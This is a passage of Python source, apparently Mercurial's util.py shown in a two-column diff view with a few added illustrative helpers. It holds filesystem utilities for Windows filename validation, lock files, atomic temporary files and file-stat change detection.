1591 oslink(src, dst)
1597 oslink(src, dst)
1592 except (IOError, OSError):
1598 except (IOError, OSError):
1593 hardlink = False
1599 hardlink = False
1594 shutil.copy(src, dst)
1600 shutil.copy(src, dst)
1595 else:
1601 else:
1596 shutil.copy(src, dst)
1602 shutil.copy(src, dst)
1597 num += 1
1603 num += 1
1598 progress(topic, num)
1604 progress(topic, num)
1599 progress(topic, None)
1605 progress(topic, None)
1600
1606
1601 return hardlink, num
1607 return hardlink, num
1602
1608
1603 _winreservednames = {
1609 _winreservednames = {
1604 'con', 'prn', 'aux', 'nul',
1610 'con', 'prn', 'aux', 'nul',
1605 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1611 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1606 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1612 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1607 }
1613 }
1608 _winreservedchars = ':*?"<>|'
1614 _winreservedchars = ':*?"<>|'
1609 def checkwinfilename(path):
1615 def checkwinfilename(path):
1610 r'''Check that the base-relative path is a valid filename on Windows.
1616 r'''Check that the base-relative path is a valid filename on Windows.
1611 Returns None if the path is ok, or a UI string describing the problem.
1617 Returns None if the path is ok, or a UI string describing the problem.
1612
1618
1613 >>> checkwinfilename(b"just/a/normal/path")
1619 >>> checkwinfilename(b"just/a/normal/path")
1614 >>> checkwinfilename(b"foo/bar/con.xml")
1620 >>> checkwinfilename(b"foo/bar/con.xml")
1615 "filename contains 'con', which is reserved on Windows"
1621 "filename contains 'con', which is reserved on Windows"
1616 >>> checkwinfilename(b"foo/con.xml/bar")
1622 >>> checkwinfilename(b"foo/con.xml/bar")
1617 "filename contains 'con', which is reserved on Windows"
1623 "filename contains 'con', which is reserved on Windows"
1618 >>> checkwinfilename(b"foo/bar/xml.con")
1624 >>> checkwinfilename(b"foo/bar/xml.con")
1619 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1625 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1620 "filename contains 'AUX', which is reserved on Windows"
1626 "filename contains 'AUX', which is reserved on Windows"
1621 >>> checkwinfilename(b"foo/bar/bla:.txt")
1627 >>> checkwinfilename(b"foo/bar/bla:.txt")
1622 "filename contains ':', which is reserved on Windows"
1628 "filename contains ':', which is reserved on Windows"
1623 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1629 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1624 "filename contains '\\x07', which is invalid on Windows"
1630 "filename contains '\\x07', which is invalid on Windows"
1625 >>> checkwinfilename(b"foo/bar/bla ")
1631 >>> checkwinfilename(b"foo/bar/bla ")
1626 "filename ends with ' ', which is not allowed on Windows"
1632 "filename ends with ' ', which is not allowed on Windows"
1627 >>> checkwinfilename(b"../bar")
1633 >>> checkwinfilename(b"../bar")
1628 >>> checkwinfilename(b"foo\\")
1634 >>> checkwinfilename(b"foo\\")
1629 "filename ends with '\\', which is invalid on Windows"
1635 "filename ends with '\\', which is invalid on Windows"
1630 >>> checkwinfilename(b"foo\\/bar")
1636 >>> checkwinfilename(b"foo\\/bar")
1631 "directory name ends with '\\', which is invalid on Windows"
1637 "directory name ends with '\\', which is invalid on Windows"
1632 '''
1638 '''
1633 if path.endswith('\\'):
1639 if path.endswith('\\'):
1634 return _("filename ends with '\\', which is invalid on Windows")
1640 return _("filename ends with '\\', which is invalid on Windows")
1635 if '\\/' in path:
1641 if '\\/' in path:
1636 return _("directory name ends with '\\', which is invalid on Windows")
1642 return _("directory name ends with '\\', which is invalid on Windows")
1637 for n in path.replace('\\', '/').split('/'):
1643 for n in path.replace('\\', '/').split('/'):
1638 if not n:
1644 if not n:
1639 continue
1645 continue
1640 for c in _filenamebytestr(n):
1646 for c in _filenamebytestr(n):
1641 if c in _winreservedchars:
1647 if c in _winreservedchars:
1642 return _("filename contains '%s', which is reserved "
1648 return _("filename contains '%s', which is reserved "
1643 "on Windows") % c
1649 "on Windows") % c
1644 if ord(c) <= 31:
1650 if ord(c) <= 31:
1645 return _("filename contains '%s', which is invalid "
1651 return _("filename contains '%s', which is invalid "
1646 "on Windows") % escapestr(c)
1652 "on Windows") % escapestr(c)
1647 base = n.split('.')[0]
1653 base = n.split('.')[0]
1648 if base and base.lower() in _winreservednames:
1654 if base and base.lower() in _winreservednames:
1649 return _("filename contains '%s', which is reserved "
1655 return _("filename contains '%s', which is reserved "
1650 "on Windows") % base
1656 "on Windows") % base
1651 t = n[-1:]
1657 t = n[-1:]
1652 if t in '. ' and n not in '..':
1658 if t in '. ' and n not in '..':
1653 return _("filename ends with '%s', which is not allowed "
1659 return _("filename ends with '%s', which is not allowed "
1654 "on Windows") % t
1660 "on Windows") % t
1655
1661
1656 if pycompat.iswindows:
1662 if pycompat.iswindows:
1657 checkosfilename = checkwinfilename
1663 checkosfilename = checkwinfilename
1658 timer = time.clock
1664 timer = time.clock
1659 else:
1665 else:
1660 checkosfilename = platform.checkosfilename
1666 checkosfilename = platform.checkosfilename
1661 timer = time.time
1667 timer = time.time
1662
1668
1663 if safehasattr(time, "perf_counter"):
1669 if safehasattr(time, "perf_counter"):
1664 timer = time.perf_counter
1670 timer = time.perf_counter
1665
1671
1666 def makelock(info, pathname):
1672 def makelock(info, pathname):
1667 """Create a lock file atomically if possible
1673 """Create a lock file atomically if possible
1668
1674
1669 This may leave a stale lock file if symlink isn't supported and signal
1675 This may leave a stale lock file if symlink isn't supported and signal
1670 interrupt is enabled.
1676 interrupt is enabled.
1671 """
1677 """
1672 try:
1678 try:
1673 return os.symlink(info, pathname)
1679 return os.symlink(info, pathname)
1674 except OSError as why:
1680 except OSError as why:
1675 if why.errno == errno.EEXIST:
1681 if why.errno == errno.EEXIST:
1676 raise
1682 raise
1677 except AttributeError: # no symlink in os
1683 except AttributeError: # no symlink in os
1678 pass
1684 pass
1679
1685
1680 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1686 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1681 ld = os.open(pathname, flags)
1687 ld = os.open(pathname, flags)
1682 os.write(ld, info)
1688 os.write(ld, info)
1683 os.close(ld)
1689 os.close(ld)
1684
1690
1685 def readlock(pathname):
1691 def readlock(pathname):
1686 try:
1692 try:
1687 return os.readlink(pathname)
1693 return os.readlink(pathname)
1688 except OSError as why:
1694 except OSError as why:
1689 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1695 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1690 raise
1696 raise
1691 except AttributeError: # no symlink in os
1697 except AttributeError: # no symlink in os
1692 pass
1698 pass
1693 fp = posixfile(pathname, 'rb')
1699 fp = posixfile(pathname, 'rb')
1694 r = fp.read()
1700 r = fp.read()
1695 fp.close()
1701 fp.close()
1696 return r
1702 return r
1697
1703
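# Illustrative sketch (hypothetical lock path and contents): the lock info
# round-trips whether the platform stores it as a symlink target or as a
# small regular file.
#
#   makelock(b'host.example.com:12345', b'.hg/wlock')
#   readlock(b'.hg/wlock')      # -> b'host.example.com:12345'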
1698 def fstat(fp):
1704 def fstat(fp):
1699 '''stat file object that may not have fileno method.'''
1705 '''stat file object that may not have fileno method.'''
1700 try:
1706 try:
1701 return os.fstat(fp.fileno())
1707 return os.fstat(fp.fileno())
1702 except AttributeError:
1708 except AttributeError:
1703 return os.stat(fp.name)
1709 return os.stat(fp.name)
1704
1710
1705 # File system features
1711 # File system features
1706
1712
1707 def fscasesensitive(path):
1713 def fscasesensitive(path):
1708 """
1714 """
1709 Return true if the given path is on a case-sensitive filesystem
1715 Return true if the given path is on a case-sensitive filesystem
1710
1716
1711 Requires a path (like /foo/.hg) ending with a foldable final
1717 Requires a path (like /foo/.hg) ending with a foldable final
1712 directory component.
1718 directory component.
1713 """
1719 """
1714 s1 = os.lstat(path)
1720 s1 = os.lstat(path)
1715 d, b = os.path.split(path)
1721 d, b = os.path.split(path)
1716 b2 = b.upper()
1722 b2 = b.upper()
1717 if b == b2:
1723 if b == b2:
1718 b2 = b.lower()
1724 b2 = b.lower()
1719 if b == b2:
1725 if b == b2:
1720 return True # no evidence against case sensitivity
1726 return True # no evidence against case sensitivity
1721 p2 = os.path.join(d, b2)
1727 p2 = os.path.join(d, b2)
1722 try:
1728 try:
1723 s2 = os.lstat(p2)
1729 s2 = os.lstat(p2)
1724 if s2 == s1:
1730 if s2 == s1:
1725 return False
1731 return False
1726 return True
1732 return True
1727 except OSError:
1733 except OSError:
1728 return True
1734 return True
1729
1735
1730 try:
1736 try:
1731 import re2
1737 import re2
1732 _re2 = None
1738 _re2 = None
1733 except ImportError:
1739 except ImportError:
1734 _re2 = False
1740 _re2 = False
1735
1741
1736 class _re(object):
1742 class _re(object):
1737 def _checkre2(self):
1743 def _checkre2(self):
1738 global _re2
1744 global _re2
1739 try:
1745 try:
1740 # check if match works, see issue3964
1746 # check if match works, see issue3964
1741 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1747 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1742 except ImportError:
1748 except ImportError:
1743 _re2 = False
1749 _re2 = False
1744
1750
1745 def compile(self, pat, flags=0):
1751 def compile(self, pat, flags=0):
1746 '''Compile a regular expression, using re2 if possible
1752 '''Compile a regular expression, using re2 if possible
1747
1753
1748 For best performance, use only re2-compatible regexp features. The
1754 For best performance, use only re2-compatible regexp features. The
1749 only flags from the re module that are re2-compatible are
1755 only flags from the re module that are re2-compatible are
1750 IGNORECASE and MULTILINE.'''
1756 IGNORECASE and MULTILINE.'''
1751 if _re2 is None:
1757 if _re2 is None:
1752 self._checkre2()
1758 self._checkre2()
1753 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1759 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1754 if flags & remod.IGNORECASE:
1760 if flags & remod.IGNORECASE:
1755 pat = '(?i)' + pat
1761 pat = '(?i)' + pat
1756 if flags & remod.MULTILINE:
1762 if flags & remod.MULTILINE:
1757 pat = '(?m)' + pat
1763 pat = '(?m)' + pat
1758 try:
1764 try:
1759 return re2.compile(pat)
1765 return re2.compile(pat)
1760 except re2.error:
1766 except re2.error:
1761 pass
1767 pass
1762 return remod.compile(pat, flags)
1768 return remod.compile(pat, flags)
1763
1769
1764 @propertycache
1770 @propertycache
1765 def escape(self):
1771 def escape(self):
1766 '''Return the version of escape corresponding to self.compile.
1772 '''Return the version of escape corresponding to self.compile.
1767
1773
1768 This is imperfect because whether re2 or re is used for a particular
1774 This is imperfect because whether re2 or re is used for a particular
1769 function depends on the flags, etc, but it's the best we can do.
1775 function depends on the flags, etc, but it's the best we can do.
1770 '''
1776 '''
1771 global _re2
1777 global _re2
1772 if _re2 is None:
1778 if _re2 is None:
1773 self._checkre2()
1779 self._checkre2()
1774 if _re2:
1780 if _re2:
1775 return re2.escape
1781 return re2.escape
1776 else:
1782 else:
1777 return remod.escape
1783 return remod.escape
1778
1784
1779 re = _re()
1785 re = _re()
1780
1786
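# Illustrative sketch: callers use this instance exactly like the re
# module; re2 is used transparently when it is available and the flags are
# compatible. The pattern below is hypothetical.
#
#   pat = re.compile(br'revision (\d+)', remod.IGNORECASE)
#   m = pat.match(b'Revision 42')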
1781 _fspathcache = {}
1787 _fspathcache = {}
1782 def fspath(name, root):
1788 def fspath(name, root):
1783 '''Get name in the case stored in the filesystem
1789 '''Get name in the case stored in the filesystem
1784
1790
1785 The name should be relative to root, and be normcase-ed for efficiency.
1791 The name should be relative to root, and be normcase-ed for efficiency.
1786
1792
1787 Note that this function is unnecessary and should not be
1793 Note that this function is unnecessary and should not be
1788 called for case-sensitive filesystems (simply because it's expensive).
1794 called for case-sensitive filesystems (simply because it's expensive).
1789
1795
1790 The root should be normcase-ed, too.
1796 The root should be normcase-ed, too.
1791 '''
1797 '''
1792 def _makefspathcacheentry(dir):
1798 def _makefspathcacheentry(dir):
1793 return dict((normcase(n), n) for n in os.listdir(dir))
1799 return dict((normcase(n), n) for n in os.listdir(dir))
1794
1800
1795 seps = pycompat.ossep
1801 seps = pycompat.ossep
1796 if pycompat.osaltsep:
1802 if pycompat.osaltsep:
1797 seps = seps + pycompat.osaltsep
1803 seps = seps + pycompat.osaltsep
1798 # Protect backslashes. This gets silly very quickly.
1804 # Protect backslashes. This gets silly very quickly.
1799 seps.replace('\\','\\\\')
1805 seps.replace('\\','\\\\')
1800 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1806 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1801 dir = os.path.normpath(root)
1807 dir = os.path.normpath(root)
1802 result = []
1808 result = []
1803 for part, sep in pattern.findall(name):
1809 for part, sep in pattern.findall(name):
1804 if sep:
1810 if sep:
1805 result.append(sep)
1811 result.append(sep)
1806 continue
1812 continue
1807
1813
1808 if dir not in _fspathcache:
1814 if dir not in _fspathcache:
1809 _fspathcache[dir] = _makefspathcacheentry(dir)
1815 _fspathcache[dir] = _makefspathcacheentry(dir)
1810 contents = _fspathcache[dir]
1816 contents = _fspathcache[dir]
1811
1817
1812 found = contents.get(part)
1818 found = contents.get(part)
1813 if not found:
1819 if not found:
1814 # retry "once per directory" per "dirstate.walk" which
1820 # retry "once per directory" per "dirstate.walk" which
1815 # may take place for each patch of "hg qpush", for example
1821 # may take place for each patch of "hg qpush", for example
1816 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1822 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1817 found = contents.get(part)
1823 found = contents.get(part)
1818
1824
1819 result.append(found or part)
1825 result.append(found or part)
1820 dir = os.path.join(dir, part)
1826 dir = os.path.join(dir, part)
1821
1827
1822 return ''.join(result)
1828 return ''.join(result)
1823
1829
1824 def checknlink(testfile):
1830 def checknlink(testfile):
1825 '''check whether hardlink count reporting works properly'''
1831 '''check whether hardlink count reporting works properly'''
1826
1832
1827 # testfile may be open, so we need a separate file for checking to
1833 # testfile may be open, so we need a separate file for checking to
1828 # work around issue2543 (or testfile may get lost on Samba shares)
1834 # work around issue2543 (or testfile may get lost on Samba shares)
1829 f1, f2, fp = None, None, None
1835 f1, f2, fp = None, None, None
1830 try:
1836 try:
1831 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1837 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1832 suffix='1~', dir=os.path.dirname(testfile))
1838 suffix='1~', dir=os.path.dirname(testfile))
1833 os.close(fd)
1839 os.close(fd)
1834 f2 = '%s2~' % f1[:-2]
1840 f2 = '%s2~' % f1[:-2]
1835
1841
1836 oslink(f1, f2)
1842 oslink(f1, f2)
1837 # nlinks() may behave differently for files on Windows shares if
1843 # nlinks() may behave differently for files on Windows shares if
1838 # the file is open.
1844 # the file is open.
1839 fp = posixfile(f2)
1845 fp = posixfile(f2)
1840 return nlinks(f2) > 1
1846 return nlinks(f2) > 1
1841 except OSError:
1847 except OSError:
1842 return False
1848 return False
1843 finally:
1849 finally:
1844 if fp is not None:
1850 if fp is not None:
1845 fp.close()
1851 fp.close()
1846 for f in (f1, f2):
1852 for f in (f1, f2):
1847 try:
1853 try:
1848 if f is not None:
1854 if f is not None:
1849 os.unlink(f)
1855 os.unlink(f)
1850 except OSError:
1856 except OSError:
1851 pass
1857 pass
1852
1858
1853 def endswithsep(path):
1859 def endswithsep(path):
1854 '''Check path ends with os.sep or os.altsep.'''
1860 '''Check path ends with os.sep or os.altsep.'''
1855 return (path.endswith(pycompat.ossep)
1861 return (path.endswith(pycompat.ossep)
1856 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1862 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1857
1863
1858 def splitpath(path):
1864 def splitpath(path):
1859 '''Split path by os.sep.
1865 '''Split path by os.sep.
1860 Note that this function does not use os.altsep because this is
1866 Note that this function does not use os.altsep because this is
1861 an alternative to a simple "xxx.split(os.sep)".
1867 an alternative to a simple "xxx.split(os.sep)".
1862 It is recommended to use os.path.normpath() before using this
1868 It is recommended to use os.path.normpath() before using this
1863 function if needed.'''
1869 function if needed.'''
1864 return path.split(pycompat.ossep)
1870 return path.split(pycompat.ossep)
1865
1871
1866 def gui():
1872 def gui():
1867 '''Are we running in a GUI?'''
1873 '''Are we running in a GUI?'''
1868 if pycompat.isdarwin:
1874 if pycompat.isdarwin:
1869 if 'SSH_CONNECTION' in encoding.environ:
1875 if 'SSH_CONNECTION' in encoding.environ:
1870 # handle SSH access to a box where the user is logged in
1876 # handle SSH access to a box where the user is logged in
1871 return False
1877 return False
1872 elif getattr(osutil, 'isgui', None):
1878 elif getattr(osutil, 'isgui', None):
1873 # check if a CoreGraphics session is available
1879 # check if a CoreGraphics session is available
1874 return osutil.isgui()
1880 return osutil.isgui()
1875 else:
1881 else:
1876 # pure build; use a safe default
1882 # pure build; use a safe default
1877 return True
1883 return True
1878 else:
1884 else:
1879 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1885 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1880
1886
1881 def mktempcopy(name, emptyok=False, createmode=None):
1887 def mktempcopy(name, emptyok=False, createmode=None):
1882 """Create a temporary file with the same contents from name
1888 """Create a temporary file with the same contents from name
1883
1889
1884 The permission bits are copied from the original file.
1890 The permission bits are copied from the original file.
1885
1891
1886 If the temporary file is going to be truncated immediately, you
1892 If the temporary file is going to be truncated immediately, you
1887 can use emptyok=True as an optimization.
1893 can use emptyok=True as an optimization.
1888
1894
1889 Returns the name of the temporary file.
1895 Returns the name of the temporary file.
1890 """
1896 """
1891 d, fn = os.path.split(name)
1897 d, fn = os.path.split(name)
1892 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1898 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1893 os.close(fd)
1899 os.close(fd)
1894 # Temporary files are created with mode 0600, which is usually not
1900 # Temporary files are created with mode 0600, which is usually not
1895 # what we want. If the original file already exists, just copy
1901 # what we want. If the original file already exists, just copy
1896 # its mode. Otherwise, manually obey umask.
1902 # its mode. Otherwise, manually obey umask.
1897 copymode(name, temp, createmode)
1903 copymode(name, temp, createmode)
1898 if emptyok:
1904 if emptyok:
1899 return temp
1905 return temp
1900 try:
1906 try:
1901 try:
1907 try:
1902 ifp = posixfile(name, "rb")
1908 ifp = posixfile(name, "rb")
1903 except IOError as inst:
1909 except IOError as inst:
1904 if inst.errno == errno.ENOENT:
1910 if inst.errno == errno.ENOENT:
1905 return temp
1911 return temp
1906 if not getattr(inst, 'filename', None):
1912 if not getattr(inst, 'filename', None):
1907 inst.filename = name
1913 inst.filename = name
1908 raise
1914 raise
1909 ofp = posixfile(temp, "wb")
1915 ofp = posixfile(temp, "wb")
1910 for chunk in filechunkiter(ifp):
1916 for chunk in filechunkiter(ifp):
1911 ofp.write(chunk)
1917 ofp.write(chunk)
1912 ifp.close()
1918 ifp.close()
1913 ofp.close()
1919 ofp.close()
1914 except: # re-raises
1920 except: # re-raises
1915 try:
1921 try:
1916 os.unlink(temp)
1922 os.unlink(temp)
1917 except OSError:
1923 except OSError:
1918 pass
1924 pass
1919 raise
1925 raise
1920 return temp
1926 return temp
1921
1927
1922 class filestat(object):
1928 class filestat(object):
1923 """help to exactly detect change of a file
1929 """help to exactly detect change of a file
1924
1930
1925 The 'stat' attribute is the result of 'os.stat()' if the specified 'path'
1931 The 'stat' attribute is the result of 'os.stat()' if the specified 'path'
1926 exists. Otherwise, it is None. This avoids a preparatory
1932 exists. Otherwise, it is None. This avoids a preparatory
1927 'exists()' check on the client side of this class.
1933 'exists()' check on the client side of this class.
1928 """
1934 """
1929 def __init__(self, stat):
1935 def __init__(self, stat):
1930 self.stat = stat
1936 self.stat = stat
1931
1937
1932 @classmethod
1938 @classmethod
1933 def frompath(cls, path):
1939 def frompath(cls, path):
1934 try:
1940 try:
1935 stat = os.stat(path)
1941 stat = os.stat(path)
1936 except OSError as err:
1942 except OSError as err:
1937 if err.errno != errno.ENOENT:
1943 if err.errno != errno.ENOENT:
1938 raise
1944 raise
1939 stat = None
1945 stat = None
1940 return cls(stat)
1946 return cls(stat)
1941
1947
1942 @classmethod
1948 @classmethod
1943 def fromfp(cls, fp):
1949 def fromfp(cls, fp):
1944 stat = os.fstat(fp.fileno())
1950 stat = os.fstat(fp.fileno())
1945 return cls(stat)
1951 return cls(stat)
1946
1952
1947 __hash__ = object.__hash__
1953 __hash__ = object.__hash__
1948
1954
1949 def __eq__(self, old):
1955 def __eq__(self, old):
1950 try:
1956 try:
1951 # if ambiguity between stat of new and old file is
1957 # if ambiguity between stat of new and old file is
1952 # avoided, comparison of size, ctime and mtime is enough
1958 # avoided, comparison of size, ctime and mtime is enough
1953 # to exactly detect change of a file regardless of platform
1959 # to exactly detect change of a file regardless of platform
1954 return (self.stat.st_size == old.stat.st_size and
1960 return (self.stat.st_size == old.stat.st_size and
1955 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1961 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1956 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1962 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1957 except AttributeError:
1963 except AttributeError:
1958 pass
1964 pass
1959 try:
1965 try:
1960 return self.stat is None and old.stat is None
1966 return self.stat is None and old.stat is None
1961 except AttributeError:
1967 except AttributeError:
1962 return False
1968 return False
1963
1969
1964 def isambig(self, old):
1970 def isambig(self, old):
1965 """Examine whether new (= self) stat is ambiguous against old one
1971 """Examine whether new (= self) stat is ambiguous against old one
1966
1972
1967 "S[N]" below means stat of a file at N-th change:
1973 "S[N]" below means stat of a file at N-th change:
1968
1974
1969 - S[n-1].ctime < S[n].ctime: can detect change of a file
1975 - S[n-1].ctime < S[n].ctime: can detect change of a file
1970 - S[n-1].ctime == S[n].ctime
1976 - S[n-1].ctime == S[n].ctime
1971 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1977 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1972 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1978 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1973 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1979 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1974 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1980 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1975
1981
1976 Case (*2) above means that a file was changed twice or more at
1982 Case (*2) above means that a file was changed twice or more at
1977 same time in sec (= S[n-1].ctime), and comparison of timestamp
1983 same time in sec (= S[n-1].ctime), and comparison of timestamp
1978 is ambiguous.
1984 is ambiguous.
1979
1985
1980 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1986 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1981 timestamp is ambiguous".
1987 timestamp is ambiguous".
1982
1988
1983 But advancing mtime only in case (*2) doesn't work as
1989 But advancing mtime only in case (*2) doesn't work as
1984 expected, because naturally advanced S[n].mtime in case (*1)
1990 expected, because naturally advanced S[n].mtime in case (*1)
1985 might be equal to manually advanced S[n-1 or earlier].mtime.
1991 might be equal to manually advanced S[n-1 or earlier].mtime.
1986
1992
1987 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1993 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1988 treated as ambiguous regardless of mtime, to avoid overlooking
1994 treated as ambiguous regardless of mtime, to avoid overlooking
1989 by confliction between such mtime.
1995 by confliction between such mtime.
1990
1996
1991 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1997 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1992 S[n].mtime", even if size of a file isn't changed.
1998 S[n].mtime", even if size of a file isn't changed.
1993 """
1999 """
1994 try:
2000 try:
1995 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2001 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
1996 except AttributeError:
2002 except AttributeError:
1997 return False
2003 return False
1998
2004
1999 def avoidambig(self, path, old):
2005 def avoidambig(self, path, old):
2000 """Change file stat of specified path to avoid ambiguity
2006 """Change file stat of specified path to avoid ambiguity
2001
2007
2002 'old' should be previous filestat of 'path'.
2008 'old' should be previous filestat of 'path'.
2003
2009
2004 This skips avoiding ambiguity, if a process doesn't have
2010 This skips avoiding ambiguity, if a process doesn't have
2005 appropriate privileges for 'path'. This returns False in this
2011 appropriate privileges for 'path'. This returns False in this
2006 case.
2012 case.
2007
2013
2008 Otherwise, this returns True, as "ambiguity is avoided".
2014 Otherwise, this returns True, as "ambiguity is avoided".
2009 """
2015 """
2010 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2016 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2011 try:
2017 try:
2012 os.utime(path, (advanced, advanced))
2018 os.utime(path, (advanced, advanced))
2013 except OSError as inst:
2019 except OSError as inst:
2014 if inst.errno == errno.EPERM:
2020 if inst.errno == errno.EPERM:
2015 # utime() on the file created by another user causes EPERM,
2021 # utime() on the file created by another user causes EPERM,
2016 # if a process doesn't have appropriate privileges
2022 # if a process doesn't have appropriate privileges
2017 return False
2023 return False
2018 raise
2024 raise
2019 return True
2025 return True
2020
2026
2021 def __ne__(self, other):
2027 def __ne__(self, other):
2022 return not self == other
2028 return not self == other
2023
2029
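# Editor's note: an illustrative usage sketch for the filestat helpers
# above (not part of the original module). ``path`` is a hypothetical
# caller-supplied file name.
def _examplefilestat(path):
    """Pair frompath() with avoidambig() around an in-place rewrite so a
    same-second, same-size rewrite of ``path`` stays detectable."""
    oldstat = filestat.frompath(path)
    with open(path, 'ab') as fp:
        fp.write(b'')               # stand-in for the caller's real rewrite
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # push mtime one second past the old stat (see isambig() above)
        newstat.avoidambig(path, oldstat)
    return newstat != oldstat
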
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat,
    and is useful only if the target file is guarded by a lock
    (e.g. repo.lock or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

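# Editor's note: an illustrative sketch of typical atomictempfile usage
# (not part of the original module); ``path`` and ``data`` are
# hypothetical caller-supplied values.
def _exampleatomicwrite(path, data):
    """Atomically replace ``path`` with the byte string ``data``."""
    with atomictempfile(path, 'wb') as fp:
        fp.write(data)
    # on a clean exit the temp file was renamed over ``path``; on an
    # exception it was discarded and the original file is untouched
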
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

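# Editor's note: an illustrative sketch (not part of the original module)
# showing how the three small file helpers above compose; ``path`` is a
# hypothetical caller-supplied file name.
def _examplefileio(path):
    writefile(path, b'line 1\n')    # create or overwrite with bytes
    appendfile(path, b'line 2\n')   # append more bytes
    return readfile(path)           # -> b'line 1\nline 2\n'
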
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

